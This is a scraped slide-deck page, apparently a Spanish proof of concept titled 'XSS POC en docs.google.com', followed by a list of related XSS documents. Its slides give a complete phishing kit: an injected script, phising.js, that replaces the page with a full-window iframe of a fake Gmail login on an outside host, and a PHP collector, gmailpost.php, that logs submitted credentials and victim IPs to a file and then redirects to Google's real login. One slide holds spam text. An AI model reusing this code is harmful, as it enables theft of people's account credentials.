3
XSS POC en docs.google.com ::phising.js:: document.body.innerHTML = ''; var igoogle = document.createElement('iframe'); igoogle.src = 'http://www.sinfocol.org/archivos/2009/11/gmail.htm'; igoogle.style.width = '100%'; igoogle.style.height = '100%'; igoogle.style.border = '0'; void(document.body.appendChild(igoogle));

XSS POC en docs.google

Embed Size (px)

DESCRIPTION

::phising.js:: document . body . innerHTML = ''; var igoogle = document . createElement (' iframe '); igoogle . src = ' http://www.sinfocol.org/archivos/2009/11/gmail.htm '; igoogle . style . width = ' 100% '; igoogle . style . height = ' 100% '; igoogle . style . border = ' 0 '; - PowerPoint PPT Presentation

Citation preview

Page 1: XSS POC en docs.google

XSS POC en docs.google.com

::phising.js::document.body.innerHTML = '';var igoogle = document.createElement('iframe');igoogle.src = 'http://www.sinfocol.org/archivos/2009/11/gmail.htm';igoogle.style.width = '100%';igoogle.style.height = '100%';igoogle.style.border = '0';void(document.body.appendChild(igoogle));

Page 2: XSS POC en docs.google

XSS POC en docs.google.com

::gmailpost.php::<?php$filename = 'gmail.txt';

if (count($_GET) == 0) die;

$str = "-------------------\n";$str .= "Date: " . date('d/m/Y - h:i:s a', time()) . "\n";$str .= "IP: " . $_SERVER['REMOTE_ADDR'] . "\n";$str .= "-------------------\n";foreach ($_GET as $indice => $valor) { $str .= "$indice => $valor\n";}

$file = fopen($filename, 'a');fwrite($file, $str);fclose($file);

header('Location: https://www.google.com/accounts/ServiceLogin');

Page 3: XSS POC en docs.google

GANEDINEROGRATIS

FREEMONEY $$


Poc mejoria en la educación

Poc mejoria en la educación

Documents
ADMINISTRACION DE REDES SECUENCIA DE COMANDOS EN SITIOS CRUZADOS(XSS)

ADMINISTRACION DE REDES SECUENCIA DE COMANDOS EN SITIOS CRUZADOS(XSS)

Documents
Is XSS Solvable?

Is XSS Solvable?

Documents
DOM-based XSS

DOM-based XSS

Education
PRELIMINARY SLIDESconference.hackinthebox.org/hitbsecconf2012kul... · • 2007 - Orkut Worm • 2008 - Yahoo IM XSS • 2009 - Twitter hit by multiple XSS variants, Memova XSS •

PRELIMINARY SLIDESconference.hackinthebox.org/hitbsecconf2012kul... · • 2007 - Orkut Worm • 2008 - Yahoo IM XSS • 2009 - Twitter hit by multiple XSS variants, Memova XSS •

Documents
Chuyên đề XSS

Chuyên đề XSS

Documents
XSS Documentation

XSS Documentation

Documents
Corporación Ornitorrinco Labs · 2020. 1. 17. · A3-Secuencia de comandos en sitios cruzados XSS A4-Fallas de cross site scripting XSS A4-Fallas de cross site scripting XSS A4-Referencia

Corporación Ornitorrinco Labs · 2020. 1. 17. · A3-Secuencia de comandos en sitios cruzados XSS A4-Fallas de cross site scripting XSS A4-Fallas de cross site scripting XSS A4-Referencia

Documents
XSS Defense

XSS Defense

Documents
Xss attacks

Xss attacks

Education
¿Está pensando en montar pruebas POC?

¿Está pensando en montar pruebas POC?

Documents
XSS-GUARD : Precise Dynamic Prevention of Cross Site Scripting (XSS) Attacks

XSS-GUARD : Precise Dynamic Prevention of Cross Site Scripting (XSS) Attacks

Documents
XSS ATACKS

XSS ATACKS

Documents
XSS Remediation

XSS Remediation

Technology
Xss Desvendado!

Xss Desvendado!

Technology
XSS Theory

XSS Theory

Documents
Combinatorial XSS Attack Grammars - SBA Research · Combinatorial XSS Attack Grammars XSS Vectors for ... SBA Research April 10, 2015 SBA Research, Vienna. Outline Introduction XSS

Combinatorial XSS Attack Grammars - SBA Research · Combinatorial XSS Attack Grammars XSS Vectors for ... SBA Research April 10, 2015 SBA Research, Vienna. Outline Introduction XSS

Documents
Ataques XSS en Gruyere

Ataques XSS en Gruyere

Documents
Java Security Mythen - Berlin Expert Days · XSS Stored! XSS Reflected! XSS Browser executes ... JavaServer Faces automatically escape all output. XSS in action. Don‘t take framework

Java Security Mythen - Berlin Expert Days · XSS Stored! XSS Reflected! XSS Browser executes ... JavaServer Faces automatically escape all output. XSS in action. Don‘t take framework

Documents
XSS SQLi sigurnost

XSS SQLi sigurnost

Documents
Evolution Xss

Evolution Xss

Technology
Xss a fondo

Xss a fondo

Technology
Universal XSS via IE8s XSS Filters - Black Hat Briefings · Universal XSS via IE8s XSS Filters the sordid tale of a wayward hash sign slides:

Universal XSS via IE8s XSS Filters - Black Hat Briefings · Universal XSS via IE8s XSS Filters the sordid tale of a wayward hash sign slides:

Documents
Encontrando Vulnerabilidades XSS

Encontrando Vulnerabilidades XSS

Documents
XSS Without Browser

XSS Without Browser

Education
CSP - the panacea for XSS - owasp.org another security blogger . XSS. 4 XSS ... Over 12 million email messages daily ... CSP Based IDS Magic XSS XSS XSS Test & Fix . 29

CSP - the panacea for XSS - owasp.org another security blogger . XSS. 4 XSS ... Over 12 million email messages daily ... CSP Based IDS Magic XSS XSS XSS Test & Fix . 29

Documents
XSS Google Persistentes

XSS Google Persistentes

Technology
XSS Desvendado

XSS Desvendado

Documents
Universal XSS via IE8s XSS Filters - Black Hat | Home

Universal XSS via IE8s XSS Filters - Black Hat | Home

Documents
Shibuya xss lt

Shibuya xss lt

Documents